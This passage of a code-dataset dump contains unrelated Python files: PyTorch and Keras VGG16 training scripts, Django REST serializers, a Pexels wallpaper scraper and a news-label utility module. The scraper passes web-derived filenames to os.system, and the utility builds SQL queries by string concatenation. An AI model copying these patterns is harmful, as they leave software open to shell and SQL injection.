targets) in enumerate(trainloader):\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs = net(inputs,graph,graph1,graph2)\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n train_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n accuracy=100.*correct/total\n# progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n# % (train_loss/(batch_idx+1), accuracy, correct, total))\n end_time=time.time()\n epoch_time=end_time-start_time\n data=[epoch,accuracy,train_loss/(batch_idx+1),epoch_time]\n print('trainloss:{},accuracy:{},time_used:{},graphinfo:{}'.format(train_loss/(batch_idx+1),accuracy,epoch_time,graph))\n state = {\n 'net': net.state_dict(),\n 'acc': accuracy,\n 'epoch': epoch,\n 'graph': graph,\n 'connection': connection\n }\n if epoch % 30 == 0:\n savepath='./train/'+str(args.mname)+'/checkpoints/'+str(epoch)+'_check.plk'\n print('system_saving...at {} epoch'.format(epoch))\n torch.save(state, savepath)\n\n return data\n # new = pd.DataFrame({\"epoch\":epoch,\"accuracy\":accuracy,\"loss\":train_loss/(batch_idx+1)},index=[\"0\"])\n # trainpd = trainpd.append(new,newignore_index=True)\n \n\ndef test(epoch,graph,graph1,graph2,connection):\n global best_acc\n net.eval()\n test_loss = 0\n correct = 0\n total = 0\n start_time=time.time()\n for batch_idx, (inputs, targets) in enumerate(testloader):\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = net(inputs,graph,graph1,graph2)\n loss = criterion(outputs, targets)\n\n test_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n accuracy=100.*correct/total\n\n end_time=time.time()\n epoch_time=end_time-start_time \n# progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n# % (test_loss/(batch_idx+1), 100.*correct/total, correct, total))\n\n data=[epoch,accuracy,test_loss/(batch_idx+1),epoch_time]\n print('testloss:{},accuracy:{},time_used:{}'.format(test_loss/(batch_idx+1),accuracy,epoch_time))\n # Save checkpoint.\n acc = 100.*correct/total\n if acc > best_acc:\n print('Saving..best_record')\n state = {\n 'net': net.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n 'graph': graph,\n 'connections': connection\n }\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n savepath='../outputs/'+str(args.mname)+'best_check.plk'\n torch.save(state, savepath)\n best_acc = acc\n return data\n\nnums=[]\nsparses=[]\n\nsparsity_book=[]\n\ndef extract(m):\n global sparses\n global nums\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nums.append(torch.numel(m.weight.data))\n cc=m.weight.clone().cpu()\n sparses.append(torch.mean(cc.abs()).detach().numpy())\n #print(m.weight.data)\n\na=[1,2,3,4]\ntrainnp=np.array(a)\ntestnp=np.array(a)\n\"\"\"\nfor epoch in range(start_epoch, start_epoch+1):\n nd=train(epoch, graph_matrix)\n trainnp=np.vstack((trainnp,np.array(nd)))\n ed=test(epoch, graph_matrix)\n testnp=np.vstack((testnp,np.array(ed)))\n net.apply(extract)\n sparsity_book.append(sparses)\n sparses=[]\n nums=[]\n\n\nsavepath='./train/'+str(args.mname)+'train01.csv'\ntrain_data=pd.DataFrame(trainnp,columns=['epoch','accuracy','loss','epoch_time'])\ntrain_data.to_csv(savepath)\nsavepath='./train/'+str(args.mname)+'test01.csv'\ntest_data=pd.DataFrame(testnp,columns=['epoch','accuracy','loss','epoch_time'])\ntest_data.to_csv(savepath)\n\nprint('\\n\\nstarting training with evolution')\n\"\"\"\n#learning rate change\nargs.lr=0.1\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)\n\np1 = connection_gene.population()\np2 = connection_gene.population()\np1.create_radom()\np2.create_radom()\n\n#def population(graph1, graph2):\n\ndef saving(graph, ac, epoch, connection, p= 'p1'):\n print('Saving..{}compare_record'.format(graph))\n state = {'net': net.state_dict(),'acc': ac,'epoch': epoch,'graph': graph, 'connections': connection}\n savepath='../outputs/'+str(p)+'compare_check.plk'\n torch.save(state, savepath)\n\ndef loading(p = 'p1'):\n savepath='../outputs/'+str(p)+'compare_check.plk'\n checkpoint = torch.load(savepath)\n net.load_state_dict(checkpoint['net'])\n\ndef backup(graph,ac, epoch, connection, p= 'init'): \n print('Saving..{}compare_record'.format(graph))\n state = {'net': net.state_dict(),'acc': ac,'epoch': epoch,'graph': graph,'connections': connection}\n savepath='../outputs/'+str(p)+'compare_check.plk'\n torch.save(state, savepath)\n\nbest_graph=[]\nbest_conenctions =[]\n\nfor epoch in range(start_epoch, start_epoch+90):\n best_graph = p1.graph_matrix\n print('\\ntraining individual 1')\n backup(best_graph, best_acc,epoch,p1.connections, p='init')\n nd=train(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n ed=test(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n ac_p1 = ed[1]\n saving(p1.graph_matrix,ac_p1,p1.connections,epoch,p='p1')\n print('accuracy is {}'.format(ac_p1))\n \n print('\\ntraining individual 2')\n print('backroll....')\n loading(p = 'init')\n nd1=train(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n ed1=test(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n ac_p2 = ed1[1]\n saving(p2.graph_matrix,ac_p2,epoch,p2.connections,p='p2')\n print('accuracy is {}'.format(ac_p1))\n if ac_p1 > ac_p2:\n p2.connections,p2.graph_matrix,p2.graph2,p2.graph3 = p2.generate(p1.connections)\n loading(p ='p1')\n trainnp=np.vstack((trainnp,np.array(nd)))\n testnp=np.vstack((testnp,np.array(ed)))\n best_graph = p1.graph_matrix\n best_conenctions = p1.connections\n print(\"choosing individual p1, with graph info:{}, connection info:{}\".format(p1.graph_matrix, p1.connections))\n else:\n p1.connections,p1.graph_matrix,p1.graph2,p1.graph3 = p1.generate(p2.connections)\n trainnp=np.vstack((trainnp,np.array(nd1)))\n testnp=np.vstack((testnp,np.array(ed1)))\n best_graph = p2.graph_matrix\n best_conenctions = p2.connections\n print(\"choosing individual p2, with graph info:{}, connection info:{}\".format(p2.graph_matrix, p2.connections))\n net.apply(extract)\n sparsity_book.append(sparses)\n sparses=[]\n nums=[]\n\nsavepath='../outputs/'+str(args.mname)+'train01.csv'\ntrain_data=pd.DataFrame(trainnp,columns=['epoch','accuracy','loss','epoch_time'])\ntrain_data.to_csv(savepath)\nsavepath='../outputs/'+str(args.mname)+'test01.csv'\ntest_data=pd.DataFrame(testnp,columns=['epoch','accuracy','loss','epoch_time'])\ntest_data.to_csv(savepath)\n\nprint('\\n\\nadjust learning rate to 0.01')\n#learning rate change\nargs.lr=0.01\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)\n\nfor epoch in range(90+start_epoch, 90+start_epoch+50):\n best_graph = p1.graph_matrix\n print('\\ntraining individual 1')\n backup(best_graph, best_acc,epoch,p1.connections, p='init')\n nd=train(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n ed=test(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n ac_p1 = ed[1]\n saving(p1.graph_matrix,ac_p1,p1.connections,epoch,p='p1')\n print('accuracy is {}'.format(ac_p1))\n \n print('\\ntraining individual 2')\n print('backroll....')\n loading(p = 'init')\n nd1=train(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n ed1=test(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n ac_p2 = ed1[1]\n saving(p2.graph_matrix,ac_p2,epoch,p2.connections,p='p2')\n print('accuracy is {}'.format(ac_p1))\n if ac_p1 > ac_p2:\n p2.connections,p2.graph_matrix,p2.graph2,p2.graph3 = p2.generate(p1.connections)\n loading(p ='p1')\n trainnp=np.vstack((trainnp,np.array(nd)))\n testnp=np.vstack((testnp,np.array(ed)))\n best_graph = p1.graph_matrix\n best_conenctions = p1.connections\n print(\"choosing individual p1, with graph info:{}, connection info:{}\".format(p1.graph_matrix, p1.connections))\n else:\n p1.connections,p1.graph_matrix,p1.graph2,p1.graph3 = p1.generate(p2.connections)\n trainnp=np.vstack((trainnp,np.array(nd1)))\n testnp=np.vstack((testnp,np.array(ed1)))\n best_graph = p2.graph_matrix\n best_conenctions = p2.connections\n print(\"choosing individual p2, with graph info:{}, connection info:{}\".format(p2.graph_matrix, p2.connections))\n net.apply(extract)\n sparsity_book.append(sparses)\n sparses=[]\n nums=[]\n\nsavepath='../outputs/'+str(args.mname)+'train01.csv'\ntrain_data=pd.DataFrame(trainnp,columns=['epoch','accuracy','loss','epoch_time'])\ntrain_data.to_csv(savepath)\nsavepath='../outputs/'+str(args.mname)+'test01.csv'\ntest_data=pd.DataFrame(testnp,columns=['epoch','accuracy','loss','epoch_time'])\ntest_data.to_csv(savepath)\n\nprint('\\n\\nadjust learning rate to 0.001')\n#learning rate change\nargs.lr=0.001\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)\n\n\nfor epoch in range(140+start_epoch, 140+start_epoch+30):\n best_graph = p1.graph_matrix\n print('\\ntraining individual 1')\n backup(best_graph, best_acc,epoch,p1.connections, p='init')\n nd=train(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n ed=test(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n ac_p1 = ed[1]\n saving(p1.graph_matrix,ac_p1,p1.connections,epoch,p='p1')\n print('accuracy is {}'.format(ac_p1))\n \n print('\\ntraining individual 2')\n print('backroll....')\n loading(p = 'init')\n nd1=train(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n ed1=test(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n ac_p2 = ed1[1]\n saving(p2.graph_matrix,ac_p2,epoch,p2.connections,p='p2')\n print('accuracy is {}'.format(ac_p1))\n if ac_p1 > ac_p2:\n p2.connections,p2.graph_matrix,p2.graph2,p2.graph3 = p2.generate(p1.connections)\n loading(p ='p1')\n trainnp=np.vstack((trainnp,np.array(nd)))\n testnp=np.vstack((testnp,np.array(ed)))\n best_graph = p1.graph_matrix\n best_conenctions = p1.connections\n print(\"choosing individual p1, with graph info:{}, connection info:{}\".format(p1.graph_matrix, p1.connections))\n else:\n p1.connections,p1.graph_matrix,p1.graph2,p1.graph3 = p1.generate(p2.connections)\n trainnp=np.vstack((trainnp,np.array(nd1)))\n testnp=np.vstack((testnp,np.array(ed1)))\n best_graph = p2.graph_matrix\n best_conenctions = p2.connections\n print(\"choosing individual p2, with graph info:{}, connection info:{}\".format(p2.graph_matrix, p2.connections))\n net.apply(extract)\n sparsity_book.append(sparses)\n sparses=[]\n nums=[]\n\nsavepath='../outputs/'+str(args.mname)+'train01.csv'\ntrain_data=pd.DataFrame(trainnp,columns=['epoch','accuracy','loss','epoch_time'])\ntrain_data.to_csv(savepath)\nsavepath='../outputs/'+str(args.mname)+'test01.csv'\ntest_data=pd.DataFrame(testnp,columns=['epoch','accuracy','loss','epoch_time'])\ntest_data.to_csv(savepath)\n\n\nnet.apply(extract)\n\nprint('param nums:',nums)\nprint('best accuracy is :{}'.format(best_acc))\nprint('best conenctions is {}'.format(best_conenctions))\n","sub_path":"train_deep_c100.py","file_name":"train_deep_c100.py","file_ext":"py","file_size_in_byte":14854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"332364894","text":"from rest_framework import serializers\nfrom boiler_datacollection.models import BoilerDatacollection\nfrom django.contrib.auth.models import User\n\nclass BoilerDatacollectionSerializer(serializers.HyperlinkedModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n start_date = serializers.ReadOnlyField()\n id = serializers.ReadOnlyField()\n\n class Meta:\n model = BoilerDatacollection\n fields = ('id', 'url', 'client', 'start_date', 'owner', 'notes',\n 'name', 'boiler_capacity_mbh', 'hours_of_operation',\n 'separately_meter', 'make_up_water_log_separate_bill',\n 'no_of_steam_traps', 'steam_trap_audit_performed',\n 'is_the_header_insulated', 'aerator_tank_pressure',\n 'percentage_condensate_that_returns_to_boiler',\n 'production_pressure', 'aerator_tank_temp')\n","sub_path":"boiler_datacollection/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"346429578","text":"import requests\nfrom bs4 import BeautifulSoup\nimport subprocess\nfrom os import path, system\n\n\ndef run(dir_wallpappers):\n wallpapers_dir = dir_wallpappers\n command_terminal_get_screen_size = \"xdpyinfo | awk '/dimensions/{print $2}'\"\n screen_size = subprocess.check_output(\n command_terminal_get_screen_size, shell=True).decode(\"utf-8\").split('x')\n screen_width = int(screen_size[0])\n screen_height = int(screen_size[1])\n\n # url = 'https://www.pexels.com/search/landscape/'\n url = 'https://www.pexels.com'\n response = requests.get(url)\n soup = BeautifulSoup(response.content, 'html.parser')\n image_container = soup.find_all(\n 'article', {\n 'class': 'photo-item',\n })\n\n image_pool = []\n image_selected = {\n 'author': '',\n 'title': '',\n 'size': '',\n 'url': ''\n }\n\n for image in image_container:\n try:\n image_size = image['data-photo-modal-download-value-original'].\\\n split('x')\n image_url = image['data-photo-modal-image-grid-item-srcset']\\\n .split('?')[0]\n image_width = int(image_size[0])\n image_height = int(image_size[1])\n\n if image_width == screen_width and image_height == screen_height:\n image_selected['author'] = image['data-photo-modal-user-profile-full-name']\n image_selected['title'] = image['data-meta-title']\n image_selected['size'] = image['data-photo-modal-download-value-original']\n image_selected['url'] = image_url\n\n elif image_width >= screen_width\\\n and image_height >= screen_height\\\n and image_width > image_height:\n\n image_pool.append((image_width, image_height, image))\n\n except KeyError:\n pass\n\n if not image_selected['url']:\n image_pool.sort(key=lambda x: x[0])\n image_selected['author'] = image_pool[0][2]['data-photo-modal-user-profile-full-name']\n image_selected['title'] = image_pool[0][2]['data-meta-title']\n image_selected['size'] = image_pool[0][2]['data-photo-modal-download-value-original']\n image_selected['url'] = image_pool[0][2]['data-photo-modal-image-grid-item-srcset']\\\n .split('?')[0]\n\n img_file_name = '{}__{}'.format(\n image_selected['title'], image_selected['author'])\n\n img_file_name = img_file_name.replace('·', '').replace(' ', '_')\n\n img_full_path = path.join(wallpapers_dir, img_file_name)\n\n with open(img_full_path, 'wb') as img:\n img.write(requests.get(image_selected['url']).content)\n\n system('gsettings set org.gnome.desktop.background picture-uri file://{}'.format(\n img_full_path\n ))\n\n print(img_full_path)\n\n\n'''\n name: data-photo-modal-user-profile-full-name\n profile: data-photo-modal-user-profile-link\n title: data-meta-title\n size: data-photo-modal-download-value-original\n url: data-photo-modal-image-grid-item-src\n '''\n\n# /usr/share/backgrounds/warty-final-ubuntu.png'\n# file:///usr/share/backgrounds/warty-final-ubuntu.png\n\n# print(image_selected['data-photo-modal-download-url'])\n\n\nif __name__ == '__main__':\n run('/home/quattro/Imágenes/wallpapers')\n","sub_path":"setWallpapper.py","file_name":"setWallpapper.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"629815937","text":"\"\"\" Utility functions for jupyter notebooks \"\"\"\n\nimport logging\nimport os\nimport pickle\nimport re\nimport sqlite3\nimport inspect\nimport sys\nimport json\n\nimport pandas as pd\n\nTMP_PATH = None\n\nDATA_RAW_PATH = \"../data/raw/\"\n\nGT_COLS = {\n \"NewsGuard\": [\n \"NewsGuard, Does not repeatedly publish false content\",\n \"NewsGuard, Gathers and presents information responsibly\",\n \"NewsGuard, Regularly corrects or clarifies errors\",\n \"NewsGuard, Handles the difference between news and opinion responsibly\",\n \"NewsGuard, Avoids deceptive headlines\",\n \"NewsGuard, Website discloses ownership and financing\",\n \"NewsGuard, Clearly labels advertising\",\n \"NewsGuard, Reveals who's in charge, including any possible conflicts of interest\",\n \"NewsGuard, Provides information about content creators\",\n \"NewsGuard, score\",\n \"NewsGuard, overall_class\",\n ],\n \"Pew Research Center\": [\n \"Pew Research Center, known_by_40%\",\n \"Pew Research Center, total\",\n \"Pew Research Center, consistently_liberal\",\n \"Pew Research Center, mostly_liberal\",\n \"Pew Research Center, mixed\",\n \"Pew Research Center, mostly conservative\",\n \"Pew Research Center, consistently conservative\",\n ],\n \"Wikipedia\": [\"Wikipedia, is_fake\"],\n \"Open Sources\": [\n \"Open Sources, reliable\",\n \"Open Sources, fake\",\n \"Open Sources, unreliable\",\n \"Open Sources, bias\",\n \"Open Sources, conspiracy\",\n \"Open Sources, hate\",\n \"Open Sources, junksci\",\n \"Open Sources, rumor\",\n \"Open Sources, blog\",\n \"Open Sources, clickbait\",\n \"Open Sources, political\",\n \"Open Sources, satire\",\n \"Open Sources, state\",\n ],\n \"Media Bias / Fact Check\": [\n \"Media Bias / Fact Check, label\",\n \"Media Bias / Fact Check, factual_reporting\",\n \"Media Bias / Fact Check, extreme_left\",\n \"Media Bias / Fact Check, right\",\n \"Media Bias / Fact Check, extreme_right\",\n \"Media Bias / Fact Check, propaganda\",\n \"Media Bias / Fact Check, fake_news\",\n \"Media Bias / Fact Check, some_fake_news\",\n \"Media Bias / Fact Check, failed_fact_checks\",\n \"Media Bias / Fact Check, conspiracy\",\n \"Media Bias / Fact Check, pseudoscience\",\n \"Media Bias / Fact Check, hate_group\",\n \"Media Bias / Fact Check, anti_islam\",\n \"Media Bias / Fact Check, nationalism\",\n ],\n \"Allsides\": [\n \"Allsides, bias_rating\",\n \"Allsides, community_agree\",\n \"Allsides, community_disagree\",\n \"Allsides, community_label\",\n ],\n \"BuzzFeed\": [\"BuzzFeed, leaning\"],\n \"Politifact\": [\n \"PolitiFact, Pants on Fire!\",\n \"PolitiFact, False\",\n \"PolitiFact, Mostly False\",\n \"PolitiFact, Half-True\",\n \"PolitiFact, Mostly True\",\n \"PolitiFact, True\",\n ],\n}\n\n# The dictionary of source names that are actually the same, but differ textually between MBC and NELA\nMBC_to_NELA = {\n \"New York Times\": \"The New York Times\",\n \"Wall Street Journal\": \"WSJ Washington Wire\",\n \"ABC\": \"ABC News\",\n \"Washington Examiner\": \"The Washington Examiner\",\n \"The Blaze\": \"TheBlaze\",\n \"BuzzFeed\": \"Buzzfeed\",\n \"Mother Jones\": \"MotherJones\",\n \"National Public Radio\": \"NPR\",\n \"The New Yorker\": \"New Yorker\",\n \"Huffington Post\": \"The Huffington Post\",\n \"Intercept\": \"The Intercept\",\n \"Daily Caller\": \"The Daily Caller\",\n \"Fiscal Times\": \"The Fiscal Times\",\n \"ShareBlue\": \"Shareblue\",\n \"InfoWars\": \"Infowars\",\n \"Think Progress\": \"ThinkProgress\",\n \"CBS\": \"CBS News\"\n}\n\n\ndef nela_load_labels():\n labels_df = pd.read_csv(os.path.join(DATA_RAW_PATH, \"nela\", \"labels.csv\"))\n labels_df = labels_df.rename(columns={\"Unnamed: 0\": \"Source\"})\n return labels_df\n\n\ndef nela_load_media_bias_monitor():\n with open(\"../data/raw/nela_sources_alt.json\", \"r\") as infile:\n data = json.load(infile)\n return data\n\n\ndef nela_labels_gtsource(labels_df, gt_source):\n \"\"\" only return label columns from specified ground truth source \"\"\"\n return labels_df[GT_COLS[gt_source]]\n\n\ndef load_dataset(cache_path):\n with open(\"../data/cache/\" + cache_path, \"rb\") as infile:\n obj = pickle.load(infile)\n return obj\n\n\ndef load_selection_dataset(name):\n # return pd.read_csv(\"../data/cache/\" + name)\n return pd.read_pickle(\"../data/cache/\" + name)\n\n\ndef load_fold_divisions_dataset(selection_tag=\"\", bias=True):\n if bias:\n with open(f\"../data/cache/{selection_tag}folds_selection.json\", 'r') as infile:\n folds = json.load(infile)\n else:\n print(f\"../data/cache/{selection_tag}reliability_folds_selection.json\")\n with open(f\"../data/cache/{selection_tag}reliability_folds_selection.json\", 'r') as infile:\n folds = json.load(infile)\n return folds\n\n\ndef load_scraped_mpc():\n return pd.read_pickle(\"../data/raw/mbc_scraped.pkl\")\n\n\n# pass count of -1 for all articles from source\n# can't run on cluster\ndef nela_load_articles_from_source(source_name, count=-1):\n conn = sqlite3.connect(\"../data/raw/nela/articles.db\")\n\n count_string = \"\"\n if count != -1:\n count_string = \"limit \" + str(count)\n\n df = pd.read_sql_query(\n \"SELECT * FROM articles WHERE source='\"\n + str(source_name)\n + \"' \"\n + count_string\n + \";\",\n conn,\n )\n return df\n\n\ndef nela_count_articles_from_source(source_name):\n conn = sqlite3.connect(\"../data/raw/nela/articles.db\")\n df = pd.read_sql_query(\n \"SELECT COUNT(*) FROM articles WHERE source='\" + str(source_name) + \"';\", conn\n )\n return df\n\n\ndef stack_dfs(df1, df2):\n \"\"\" Appends df2 to the end of df1, but assigns df2 to df1 if df1 is None \"\"\"\n if df1 is None:\n df1 = df2\n else:\n df1 = df1.append(df2, ignore_index=True)\n\n return df1\n\n\ndef clean_newlines(content):\n content = re.sub(\"(\\r\\n)+\", \" \", str(content))\n return content\n\n\ndef clean_symbols(content):\n content = re.sub(r'[\\!\"#$%&\\*+,-./:;<=>?@^_`()|~=]', \"\", content)\n return content\n\n\ndef check_output_necessary(output_path, overwrite):\n \"\"\"Determine whether a step is necessary by checking for its existence/overwrite combo.\n\n Returns true if should continue with step, false if can skip.\n \"\"\"\n\n logging.debug(\"Checking for existence of '%s'...\", output_path)\n\n if os.path.exists(output_path):\n logging.debug(\"Output found.\")\n logging.info(\"Cached version found.\")\n\n # check if should overwite the existing output or not\n if overwrite:\n logging.debug(\"Overwrite requested, continuing...\")\n logging.warning(\"Overwriting an existing output '%s'!\", output_path)\n return True\n\n logging.debug(\"No overwrite requested, skip step...\")\n return False\n\n # if this point hit, the file doesn't exist yet\n return True\n\n\ndef init_logging(log_path=None):\n \"\"\"Sets up logging config, including associated file output.\"\"\"\n log_formatter = logging.Formatter(\n \"%(asctime)s - %(filename)s - %(levelname)s - %(message)s\"\n )\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.DEBUG)\n\n if log_path is not None:\n file_handler = logging.FileHandler(log_path)\n file_handler.setFormatter(log_formatter)\n root_logger.addHandler(file_handler)\n\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(log_formatter)\n root_logger.addHandler(console_handler)\n\n\ndef create_dir(path):\n try:\n os.mkdir(path)\n except:\n logging.warning(\"Did not create directory %s\", path)\n\n\ndef dump_log(func):\n \"\"\"Decorator to print function call details - parameters names and effective values.\"\"\"\n def wrapper(*args, **kwargs):\n func_args = inspect.signature(func).bind(*args, **kwargs).arguments\n func_args_str = ', '.join('{} = {!r}'.format(*item) for item in func_args.items())\n logging.info(f'CALL::{func.__module__}.{func.__qualname__}({func_args_str})')\n return func(*args, **kwargs)\n return wrapper\n","sub_path":"bias/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"517919203","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 17 16:01:13 2020\n\n@author: Administrator\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 16 18:06:20 2020\n\n@author: Administrator\n\"\"\"\nfrom keras.models import Sequential\n#from keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\n#from keras.initializers import TruncatedNormal\nfrom keras.layers.core import Activation\nfrom keras.layers.core import Flatten\nfrom keras.layers.core import Dropout\nfrom keras.layers.core import Dense\nfrom keras import backend as K\nimport keras\n#import tensorflow as tf\nimport os\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom keras.optimizers import SGD\nfrom keras.preprocessing.image import ImageDataGenerator\n#import utils_paths\nimport matplotlib.pyplot as plt\nimport numpy as np\n#import argparse\nimport random\nimport pickle\nimport cv2\nfrom keras import optimizers\nfrom keras import applications\nfrom keras.models import Sequential, Model\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras.preprocessing.image import ImageDataGenerator\nimage_types = (\".jpg\", \".jpeg\", \".png\", \".bmp\", \".tif\", \".tiff\")\n \n \ndef list_images(basePath, contains=None):\n # 返回有效的图片路径数据集\n return list_files(basePath, validExts=image_types, contains=contains)\n\ndef list_files(basePath, validExts=None, contains=None):\n # 遍历图片数据目录,生成每张图片的路径\n for (rootDir, dirNames, filenames) in os.walk(basePath):\n # 循环遍历当前目录中的文件名\n for filename in filenames:\n # if the contains string is not none and the filename does not contain\n # the supplied string, then ignore the file\n if contains is not None and filename.find(contains) == -1:\n continue\n \n # 通过确定.的位置,从而确定当前文件的文件扩展名\n ext = filename[filename.rfind(\".\"):].lower()\n \n # 检查文件是否为图像,是否应进行处理\n if validExts is None or ext.endswith(validExts):\n # 构造图像路径\n imagePath = os.path.join(rootDir, filename)\n yield imagePath\n\ndef loadfile():\n # 读取数据和标签\n print(\"------开始读取数据vgg16------\")\n data = []\n labels = []\n # 拿到图像数据路径,方便后续读取\n imagePaths = sorted(list(list_images('./dataset/set10')))\n random.seed(42)\n random.shuffle(imagePaths)\n #print(imagePaths)\n # 遍历读取数据\n for imagePath in imagePaths:\n # 读取图像数据\n image = cv2.imread(imagePath)\n image = cv2.resize(image, (64, 64))\n data.append(image)\n # 读取标签\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\n # 对图像数据做scale操作\n data = np.array(data, dtype=\"float\") / 255.0\n labels = np.array(labels)\n # 数据集切分\n (trainX, testX, trainY, testY) = train_test_split(data,labels, test_size=0.20, random_state=42)\n #print(trainX.shape,testX.shape,trainY.shape,testY.shape)\n # 转换标签为one-hot encoding格式\n lb = LabelBinarizer()\n trainY = lb.fit_transform(trainY) #该放多针对多分类有效\n testY = lb.transform(testY)\n #\n trainY = keras.utils.to_categorical(trainY,2)\n testY = keras.utils.to_categorical(testY,2)\n return trainX, testX, trainY, testY,lb\nclass SimpleVGGNet:\n @staticmethod\n def build(width, height, depth, classes):\n# model = Sequential()\n inputShape = (height, width, depth)\n# chanDim = -1\n\n if K.image_data_format() == \"channels_first\":\n inputShape = (depth, height, width)\n# chanDim = 1\n# model.add(Conv2D(64, (3, 3), padding=\"same\",\n# input_shape=inputShape))\n\n base_model = applications.VGG16(weights=\"imagenet\", include_top=False,\n input_shape=inputShape) # 预训练的VGG16网络,替换掉顶部网络\n print('base_model',base_model.summary())\n \n for layer in base_model.layers[:15]: layer.trainable = False # 冻结预训练网络前15层\n \n top_model = Sequential() # 自定义顶层网络\n top_model.add(Flatten(input_shape=base_model.output_shape[1:])) # 将预训练网络展平\n top_model.add(Dense(2, activation='relu')) # 全连接层,输入像素256\n top_model.add(Dropout(0.5)) # Dropout概率0.5\n top_model.add(Dense(classes, activation='softmax')) # 输出层,二分类\n print('top_model',top_model.summary())\n model = Model(inputs=base_model.input, outputs=top_model(base_model.output))\n return model\nif __name__ == '__main__':\n trainX, testX, trainY, testY,lb=loadfile()\n print(trainX.shape,testX.shape,trainY.shape,testY.shape,lb)\n# np.save('Train-img_data',trainX)\n# np.save('Train-img_label',trainY)\n# np.save('Test-img_data',testX)\n# np.save('Test-img_label',testY)\n# print('ok')\n# trainX = np.load('Train-img_data.npy')\n# testX=np.load('Train-img_label.npy')\n# trainY=np.load('Test-img_data.npy')\n# testY=np.load('Test-img_label.npy')\n# print(testY)\n aug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1,\n height_shift_range=0.1, shear_range=0.2, zoom_range=0.2,\n horizontal_flip=True, fill_mode=\"nearest\")\n## 建立卷积神经网络\n model = SimpleVGGNet.build(width=64, height=64, depth=3,classes=len(lb.classes_))\n# # 设置初始化超参数\n INIT_LR = 0.01\n EPOCHS = 50\n BS = 32\n # 损失函数,编译模型\n print(\"------准备训练网络------\")\n opt = SGD(lr=INIT_LR, decay=INIT_LR / EPOCHS)\n model.compile(loss=\"categorical_crossentropy\", optimizer=opt,metrics=[\"accuracy\"])\n model.summary()#显示模型\n\n H = model.fit(trainX, trainY, validation_data=(testX, testY),\n epochs=EPOCHS, batch_size=32)\n# \"\"\"\n\n# # 测试\n print(\"------测试网络VGG16------\")\n predictions = model.predict(testX, batch_size=32)\n print(classification_report(testY.argmax(axis=1),\n predictions.argmax(axis=1), target_names=lb.classes_))\n# \n# # 绘制结果曲线\n N = np.arange(0, EPOCHS)\n plt.style.use(\"ggplot\")\n plt.figure()\n plt.plot(N, H.history[\"loss\"], label=\"train_loss\")\n plt.plot(N, H.history[\"val_loss\"], label=\"val_loss\")\n plt.plot(N, H.history[\"accuracy\"], label=\"train_acc\")\n plt.plot(N, H.history[\"val_accuracy\"], label=\"val_acc\")\n plt.title(\"Training Loss and Accuracy\")\n plt.xlabel(\"Epoch #\")\n plt.ylabel(\"Loss/Accuracy\")\n plt.legend()\n plt.savefig('./output/vgg16.png')\n #\n # 保存模型\n print(\"------正在保存模型------\")\n model.save('./output/vgg16.h5')\n f = open('./output/vgg16.pickle', \"wb\")\n f.write(pickle.dumps(lb))\n f.close()","sub_path":"qianyi/qy_vgg16.py","file_name":"qy_vgg16.py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"508223384","text":"from rest_framework import permissions, status, generics\nfrom rest_framework.response import Response\n\nfrom members.permissions import IsUserOrReadOnly\nfrom ..models import UserToMovie, Movie\nfrom ..serializers import 